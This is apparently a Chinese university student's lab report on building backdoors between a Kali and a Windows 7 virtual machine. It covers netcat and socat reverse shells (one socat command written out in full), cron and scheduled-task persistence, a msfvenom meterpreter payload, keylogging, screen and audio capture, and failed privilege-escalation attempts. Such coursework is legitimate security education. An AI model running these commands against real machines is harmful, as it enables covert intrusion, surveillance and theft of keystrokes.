20165207 Exp2 后门原理与实践

〇、实验准备

两个虚拟机，一个kali一个win7。kali的ip是192.168.43.72，win7的ip是192.168.43.116，在win7关掉防火墙并且虚拟机设置都选择桥接的情况下，两台虚拟机能够相互ping通。

把老师分享给我们的ncat和socat拷到win7里面。

一、实验内容

1、使用netcat获取主机操作Shell，cron启动

1.1、kali使用netcat获取主机操作shell

kali在5207端口开启监听：

win7反弹连接kali：

kali获得win7的cmd（Windows命令了解的不多，想输个who命令，结果没有。我记得是whoami或者user的啊）

1.2、配置crontab

crontab -e编辑kali的定时任务的计时器，但是按照上面的来的话kali这边只是要监听，自动启动监听我个人感觉意义不大。所以，这次我想换kali被攻击。
先在win7上开启监听，在5207端口上

kali这边crontab -e编辑计时器，编辑器可以选，要是多按了回车默认选取了，可以输按select-editor更改

然后在里面，加上一个每1分钟执行一次的命令

win7获得了shell

2、使用socat获取主机操作Shell, 任务计划启动

我理解任务计划启动是指win7里面的计划任务设置用socat反弹连接kali使kali获得win7的shell

2.1、kali开启监听

socat在kali上就有，使用tcp-l参数在冒号后面加上5207开启监听

2.2、win7

我在win7上输入的命令是：socat.exe - tcp 192.168.43.72:5207产生的效果只是限于相互发送消息

要反弹连接原来需要用到exec参数，并且tcp参数要改成tcp-connect参数，否则会报这样的错

所以，经过搜索资料和尝试，我输入的最终可以反弹连接的有效命令是：socat.exe tcp-connect:192.168.43.72:5207 exec:cmd.exe,pty,stderr
如图，win7反弹连接成功，kali获得了cmd.exe

kali:

2.3、win7任务计划

在任务计划程序里新建任务：

然后设置启动条件：

等候一分钟：
win7这：
kali里：

3、使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

3.1、生成可执行文件并传输

用msfvenom生成可执行文件，msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.72 PORT=5207 -f exe > 5207.exe
因为要用kali获取win7shell所以lhost设为kali的ip地址，p参数用于指定攻击载荷reverse_tcp然后f参数是用来指定生成文件格式的

nc传给win7：win7首先开启监听，监听在端口5207，接收文件重定向到文件win5207.exe

kali这边发送

传输结束之后接收端的nc并没有像网上说的一样自动退出

3.2、kali上的msf开启监听

开启msfconsole然后按照实验指导里面操作

win7里面运行win5207.exe:
好吧，不知道为什么出了问题了，我重新连了一下网，ip也变了，kali是10.1.1.217，win7是10.1.1.113
然后，用一样的原理重新做了一次(上一个网，失败了不知道多少次)，问题就没了，因为有点生气这次可执行文件的名字是XXXX.exe。
kali这边，成功了，输了个命令dir查看文件，里面就有刚才一怒之下取的xxxx.exe：

4、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

4.1、获取音频摄像头等内容

获取音频摄像头等的操作在实验指导的meterpreter常用功能里面有，我就不粘贴过来了，直接进行操作。
当然输个help就可以看，也没有必要来回翻实验指导

找到了录制音频和截取屏幕

录制一段五秒钟的音频：

截屏，这里遇到一个问题，我的摄像头无法连接到win7虚拟机，错误在右下角的摄像头标签那一闪而过。
我想起来上次要给另一个虚拟机插一个usb3.0的U盘然后也是设备无法连接，当时没有解决直接用了共享文件夹。
在win7里也有可能是usb设备兼容性的问题，先把它的兼容性改成usb3.0

在状态栏里摄像头的图标的确是亮的：

可是虚拟机的设备管理器里面没有，重启虚拟机重新做，还是没有，根本没有，这哪有像摄像头的设备啊：

kali那边也是毫无悬念的失败了：

我实在是没弄明白这个摄像头的问题，这个摄像头看来和我无缘。
然后再试一下击键记录：
首先，kali这边keyscan_start开始记录
然后在win7那边输些东西

kali这边，还是start的状态，就可以输入keyscan_dump查看win7的击键记录

还可以看看对面是不是虚拟机，命令是run post/windows/gather/checkvm

4.2、提权

输入命令getsystem：
报错

找到了个解释，是这样的：

如果你需要对Windows7、8或以上的系统进行getsystem首先得绕过UAC。命令如下:runpost/windows/escalate/bypassuac.

尝试输进去这条命令

连命令都没有，真棒
查一下帮助手册，诶

没有bypass啊
再次失败

再试一下我搜到的令牌假冒提权的方法
先加载令牌假冒的模块“use incognito”

然后查看下令牌假冒的相关命令

用list_user查看我可以冒充的用户

看来，又失败了：

实际上我觉得如果有可用的可假冒的用户，这种假冒用户的办法我觉得应该可以提权成功的
以及，那个我搜来的bypass绕过win7对win7提权的办法为什么不行，可以有人帮我看下为啥一下不？我病好了之后请吃棒棒糖。orz